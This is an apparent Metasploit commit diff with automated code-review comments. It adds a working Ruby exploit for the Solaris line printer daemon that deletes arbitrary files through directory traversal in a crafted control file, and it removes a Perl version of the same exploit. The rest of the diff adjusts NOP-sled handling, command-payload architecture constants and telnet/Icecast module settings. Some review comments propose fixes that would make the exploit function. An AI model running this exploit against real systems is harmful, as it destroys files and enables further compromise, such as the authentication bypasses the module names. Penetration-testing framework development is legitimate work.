Miscellaneous fixes, changes to CMD payloads
git-svn-id: file:///home/svn/incoming/trunk@3296 4d416f70-5f16-0410-b530-b9f4589650da
parent
09d21fbced
commit
9fc93bbe56
@ -51,6 +51,11 @@ module Exploit
|
|||
# job.
|
||||
#
|
||||
def self.exploit_simple(exploit, opts)
|
||||
|
||||
p exploit.methods.sort
|
||||
p exploit.payload?
|
||||
p exploit.payload_info
|
||||
|
||||
# Make sure parameters are valid.
|
||||
if (opts['Payload'] == nil)
|
||||
raise MissingPayloadError,
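Review bot: The three `p exploit.methods.sort` / `p exploit.payload?` / `p exploit.payload_info` lines at the top of `exploit_simple` are leftover debug output that every caller will now get on stdout, and `p` bypasses whatever logging the framework routes elsewhere; drop them before this lands, or put them behind the framework's debug logging if the information is still needed. `p exploit.methods.sort` in particular dumps the whole reflected method list, which is noise rather than a diagnostic. The body of `exploit_simple` continues below the hunk, so any further debugging left further down is not visible here.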
|
||||
@ -110,6 +110,8 @@ class EncodedPayload
|
|||
|
||||
# Get the minimum number of nops to use
|
||||
min = (reqs['MinNops'] || 0).to_i
|
||||
min = 0 if reqs['DisableNops']
|
||||
|
||||
|
||||
# Check to see if we have enough room for the minimum requirements
|
||||
if ((reqs['Space']) and
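Review bot: `min` is assigned from `reqs['MinNops']` and then immediately overwritten when `reqs['DisableNops']` is set, which reads as two competing rules; fold them into one expression, `min = reqs['DisableNops'] ? 0 : (reqs['MinNops'] || 0).to_i`, and state the precedence with `# DisableNops wins over MinNops: a module that asks for no sled gets none`. A module that sets both `MinNops` and `DisableNops` is silently treated as wanting no sled, which is probably intended but is worth saying in that comment. The enclosing method starts and ends outside this hunk, so the later `nop_sled_size` handling is reviewed separately.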
|
||||
|
@ -164,6 +166,9 @@ class EncodedPayload
|
|||
self.nop_sled_size = reqs['MaxNops']
|
||||
end
|
||||
|
||||
# Check for the DisableNops setting
|
||||
self.nop_sled_size = 0 if reqs['DisableNops']
|
||||
|
||||
# Now construct the actual sled
|
||||
if (self.nop_sled_size > 0)
|
||||
pinst.compatible_nops.each { |nopname, nopmod|
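Review bot: `self.nop_sled_size = 0 if reqs['DisableNops']` is applied after the `MaxNops` clamp, which is the right order, but the `min` computation earlier in this method already zeroes the minimum for `DisableNops`, so the decision now lives in two places; a comment here, `# DisableNops overrides any size computed above, including the MaxNops clamp`, keeps the two from drifting apart. Because the sled loop below is skipped when the size is 0, whatever holds the sled bytes (presumably `self.nop_sled`) must already be initialised to an empty string before this point — its initialisation is not visible in the hunk, and a nil sled would fail at the later concatenation. The enclosing method starts and ends outside the hunk.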
|
||||
@ -68,23 +68,14 @@ ARCH_X86 = 'x86'
|
|||
ARCH_MIPS = 'mips'
|
||||
ARCH_PPC = 'ppc'
|
||||
ARCH_SPARC = 'sparc'
|
||||
ARCH_CMD = 'cmd'
|
||||
ARCH_TYPES =
|
||||
[
|
||||
ARCH_X86,
|
||||
ARCH_MIPS,
|
||||
ARCH_PPC,
|
||||
ARCH_SPARC
|
||||
ARCH_SPARC,
|
||||
ARCH_CMD,
|
||||
]
|
||||
|
||||
|
||||
ARCH_CMD_UNIX = 'cmd_unix'
|
||||
ARCH_CMD_LINUX = 'cmd_linux'
|
||||
ARCH_CMD_BSD = 'cmd_bsd'
|
||||
ARCH_CMD =
|
||||
[
|
||||
ARCH_CMD_UNIX,
|
||||
ARCH_CMD_LINUX,
|
||||
ARCH_CMD_BSD
|
||||
]
|
||||
|
||||
ARCH_ALL = ARCH_TYPES + ARCH_CMD
|
||||
ARCH_ALL = ARCH_TYPES
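Review bot: `ARCH_CMD` changes type from an Array (`[ARCH_CMD_UNIX, ARCH_CMD_LINUX, ARCH_CMD_BSD]`) to the String `'cmd'`, so any caller that treated it as a list (`ARCH_CMD.include?(...)`, `ARCH_CMD.each`) will now raise or quietly do substring matching; grep for `ARCH_CMD`, `ARCH_CMD_UNIX`, `ARCH_CMD_LINUX` and `ARCH_CMD_BSD` outside this diff before merging, since only two modules are updated here. `ARCH_ALL = ARCH_TYPES` binds both names to the same mutable Array, so a `<<` through either one mutates the other; closing the list with `].freeze` and writing `ARCH_ALL = ARCH_TYPES.dup.freeze` makes the aliasing explicit and safe. With the per-OS command arches gone, a module that only works on one Unix flavour can no longer express that through `Arch` and has to use `Platform`, which is presumably why the telnet module in this commit adds `'solaris'` to its platform list; a one-line comment above `ARCH_CMD = 'cmd'` saying so would save the next reader the archaeology.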
|
||||
@ -0,0 +1,102 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Solaris::Lpd::CascadeDelete < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||
'Description' => %q{
|
||||
This module uses a vulnerability in the Solaris line printer
|
||||
daemon to delete arbitrary files on an affected system. This
|
||||
can be used to exploit the rpc.walld format string flaw, the
|
||||
missing krb5.conf authentication bypass, or simply delete
|
||||
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Target', { }]
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515),
|
||||
OptString.new('RPATH', [ true, "The remote file path to delete"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# Create a simple control file...
|
||||
control = "Hmetasploit\nPr00t\n";
|
||||
|
||||
# The job ID is squashed down to three decimal digits
|
||||
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
|
||||
|
||||
# Establish the first connection to the server
|
||||
sock1 = connect(false)
|
||||
|
||||
# Request a cascaded job
|
||||
sock1.put("\x02metasploit:framework\n")
|
||||
res = sock1.get_once
|
||||
if (not res)
|
||||
print_status("The target did not accept our job request command")
|
||||
return
|
||||
end
|
||||
|
||||
# Theoretically, we could delete multiple files at once, however
|
||||
# the lp daemon will append garbage from memory to the path name
|
||||
# if we don't stick a null byte after the path. Unfortunately, this
|
||||
# null byte will prevent the parser from processing the other paths.
|
||||
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
|
||||
|
||||
dataf = "http://metasploit.com/\n"
|
||||
|
||||
print_status("Deleting #{datstore['RPATH']}...")
|
||||
if (not (
|
||||
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
|
||||
send_file(sock1, 3, "dfa" + jid + "metasploit", dataf)
|
||||
) )
|
||||
sock1.close
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
|
||||
sock1.close
|
||||
end
|
||||
|
||||
def send_file (s, type, name, data='')
|
||||
|
||||
s.put(type.chr + data.length.to_s + " " + name + "\n")
|
||||
res = s.get_once(1)
|
||||
if (not (res and res[0] == 0))
|
||||
print_status("The target did not accept our control file command (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
s.put(data)
|
||||
s.put("\x00")
|
||||
res = s.get_once(1)
|
||||
if (not (res and res[0] == 0))
|
||||
print_status("The target did not accept our control file data (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
end
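Review bot: `print_status("Deleting #{datstore['RPATH']}...")` in `exploit` misspells `datastore`, so the module raises NameError before any control file is sent; it should read `print_status("Deleting #{datastore['RPATH']}...")`. The job-request acknowledgement is only checked for presence, whereas `send_file` (and the Perl original removed in this commit) require a zero byte, and the early `return` on that path leaves `sock1` open: replace `res = sock1.get_once` / `if (not res)` with `res = sock1.get_once(1)` / `if (not (res and res.unpack('C').first == 0))` and close the socket before returning, as the later failure paths do. The same `unpack('C')` form is worth using for the two `res[0] == 0` checks in `send_file`, because `String#[]` yields a one-character String rather than an Integer on Ruby 1.9 and later, so those comparisons would never be true there. `RPATH` is spliced into the control file unescaped, so a value containing `\r` or `\n` silently becomes a second control-file line; rejecting those bytes before building `control` turns that into an explicit error. The skeleton this file replaces declared `'Privileged' => true`; since the deletion is performed by the print daemon rather than the operator, consider carrying that flag over.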
@ -1,198 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||
'Description' => %q{
|
||||
This module uses a vulnerability in the Solaris line printer
|
||||
daemon to delete arbitrary files on an affected system. This
|
||||
can be used to exploit the rpc.walld format string flaw, the
|
||||
missing krb5.conf authentication bypass, or simple delete
|
||||
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'solaris',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::solaris_lpd_unlink;
|
||||
use base "Msf::Exploit";
|
||||
use IO::Socket;
|
||||
use IO::Select;
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' =>
|
||||
[
|
||||
'H D Moore <hdm [at] metasploit.com>',
|
||||
'Optyx <optyx [at] uberhax0r.net>'
|
||||
],
|
||||
|
||||
'Arch' => [ ],
|
||||
'OS' => [ 'solaris' ],
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The LPD server port', 515],
|
||||
'RPATH' => [1, 'DATA', 'The remote path name to delete'],
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module uses a vulnerability in the Solaris line printer daemon
|
||||
to delete arbitrary files on an affected system. This can be used to exploit
|
||||
the rpc.walld format string flaw, the missing krb5.conf authentication bypass,
|
||||
or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'Targets' => [['No Target Needed']],
|
||||
|
||||
'Keys' => ['lpd'],
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_path = $self->GetVar('RPATH');
|
||||
my $res;
|
||||
|
||||
# We use one connection to configure the spool directory
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
# Send a job request that will trigger the cascade adaptor (thanks Dino!)
|
||||
$s->Send("\x02"."metasploit:framework\n");
|
||||
$res = $s->Recv(1, 5);
|
||||
if (ord($res) != 0) {
|
||||
$self->PrintLine("[*] The target did not accept our job request command");
|
||||
return;
|
||||
}
|
||||
|
||||
# The job ID is squashed down to three decimal digits
|
||||
my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$));
|
||||
|
||||
# Create a simple control file...
|
||||
my $control = "Hmetasploit\nPr00t\n";
|
||||
|
||||
# Theoretically, we could delete multiple files at once, however
|
||||
# the lp daemon will append garbage from memory to the path name
|
||||
# if we don't stick a null byte after the path. Unfortunately, this
|
||||
# null byte will prevent the parser from processing the other paths.
|
||||
$control .= "U".("../" x 10)."$target_path\x00\n";
|
||||
|
||||
my $dataf = "http://metasploit.com/\n";
|
||||
|
||||
$self->PrintLine("[*] Sending the malicious cascaded job request...");
|
||||
if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) ||
|
||||
! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf) ||
|
||||
0
|
||||
) { $s->Close; return }
|
||||
|
||||
$self->PrintLine('');
|
||||
$self->PrintLine("[*] Successfully deleted $target_path >:-]");
|
||||
return;
|
||||
}
|
||||
|
||||
sub SendFile {
|
||||
my $self = shift;
|
||||
my $sock = shift;
|
||||
my $type = shift;
|
||||
my $name = shift;
|
||||
my $data = shift;
|
||||
|
||||
$sock->Send(chr($type) .length($data). " $name\n");
|
||||
my $res = $sock->Recv(1, 5);
|
||||
if (ord($res) != 0) {
|
||||
$self->PrintLine("[*] The target did not accept our control file command ($name)");
|
||||
return;
|
||||
}
|
||||
|
||||
$sock->Send($data);
|
||||
$sock->Send("\x00");
|
||||
$res = $sock->Recv(1, 5);
|
||||
if (ord($res) != 0) {
|
||||
$self->PrintLine("[*] The target did not accept our control file data ($name)");
|
||||
return;
|
||||
}
|
||||
|
||||
$self->PrintLine(sprintf("[*] Uploaded %.4d bytes >> $name", length($data)));
|
||||
return 1;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
@ -23,14 +23,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
|||
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'unix',
|
||||
'Platform' => ['unix', 'solaris'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "",
|
||||
'MinNops' => 0,
|
||||
'MaxNops' => 0,
|
||||
'BadChars' => '',
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'PayloadCompat' =>
|
||||
{
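Review bot: `'BadChars' => ''` declares that every byte is acceptable in the command payload, yet this module delivers it through an interactive telnet login, where a `\r` or `\n` in the command would presumably end the injected line early; unless the part of the module outside this hunk escapes or rejects them, `'BadChars' => "\r\n"` is the safer declaration. The `'Platform' => ['unix', 'solaris']` change is what keeps the module paired with command payloads now that the per-OS `ARCH_CMD_*` constants are removed elsewhere in this commit, and a one-line comment would save the next reader from guessing: `# 'unix' keeps the generic cmd payloads compatible; 'solaris' matches the target OS`. The enclosing class and its `initialize` start and end outside the hunk.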
|
||||
@ -45,9 +45,7 @@ class Exploits::Windows::Http::Icecast_Header_Overflow < Msf::Exploit::Remote
|
|||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x0d\x0a\x00",
|
||||
'MinNops' => 0,
|
||||
'MaxNops' => 0,
|
||||
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
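Review bot: Replacing `'MinNops' => 0, 'MaxNops' => 0` with `'DisableNops' => true` depends on the new `DisableNops` handling in `EncodedPayload` landing in the same commit, which it does, but nothing in the module says why a sled is unwanted; a comment such as `# no NOP sled: the payload travels in an HTTP header, hence the CR/LF/NUL bad chars` would stop someone restoring the old keys later. Whether the encoder still pads the buffer up to `'Space' => 2000` once the sled is disabled is not visible from this hunk; if the overflow offset relies on that padding, the module should pad explicitly rather than trust the encoder. The `initialize` call continues past the hunk.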
|
||||